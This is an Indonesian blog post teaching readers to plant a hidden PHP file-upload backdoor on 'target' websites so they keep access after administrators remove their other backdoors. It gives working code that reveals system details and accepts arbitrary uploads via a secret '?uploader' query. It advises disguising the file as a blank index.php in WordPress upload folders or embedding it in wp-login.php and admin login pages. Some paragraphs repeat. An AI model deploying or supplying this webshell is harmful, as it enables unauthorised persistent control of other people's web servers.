Cara Memasang Script Hidden Uploader di Website - Kali ini kita akan bahas memasang Script Hidden Uploader pada website Target kita agar tidak kehilangan akses.
Biasanya digunakan untuk menyembunyikan uploader kita jadi saya biasanya menamai file tersebut index.php. Langsung saja copy file berikut :
Biasanya digunakan untuk menyembunyikan uploader kita jadi saya biasanya menamai file tersebut index.php. Langsung saja copy file berikut :
<?php
if(isset($_GET["uploader"]))
{
echo"<font color=#ffffff>".php_uname()."";
print "\n";$disable_functions = @ini_get("disable_functions");
echo "<br>DisablePHP=".$disable_functions; print "\n";
echo"<br><form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>";
if($_POST["k"]==upload)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal upload sayang";
}
}
}
Misal kita menemukan target yang index.php-nya kosong contoh seperti berikut : http://target.com/wp-content/uploads
Lalu kita Upload file hidden uploader tadi yang kita namai index.php pada dir tempat yg index.php- kosong. Lalu kita buka:
http://target.com/wp-content/uploads/index.php
Akan terlihat kosong blank, untuk memanggil uploadernya, masukan query pada url nya menjadi seperti berikut:
http://target.com/wp-content/uploads/index.php?uploader
Maka akan terlihat uploadernya.
Metode ini biasanya digunakan untuk cadangan backdoor, jika backdoor kita sudah dihapus oleh administratornya kita masih bisa upload backdoor baru.
Oiya script uploader ini kuga bisa di masukan pada script lainnya, Tempat favorit saya adalah di wp-login.php jika targetnya wordpress ya. Jika targetnya beda kalian masukan di bagian login admin saja.
Oiya script uploader ini kuga bisa di masukan pada script lainnya, Tempat favorit saya adalah di wp-login.php jika targetnya wordpress ya. Jika targetnya beda kalian masukan di bagian login admin saja.
Post a Comment
Komentar Spam Akan kami Hapus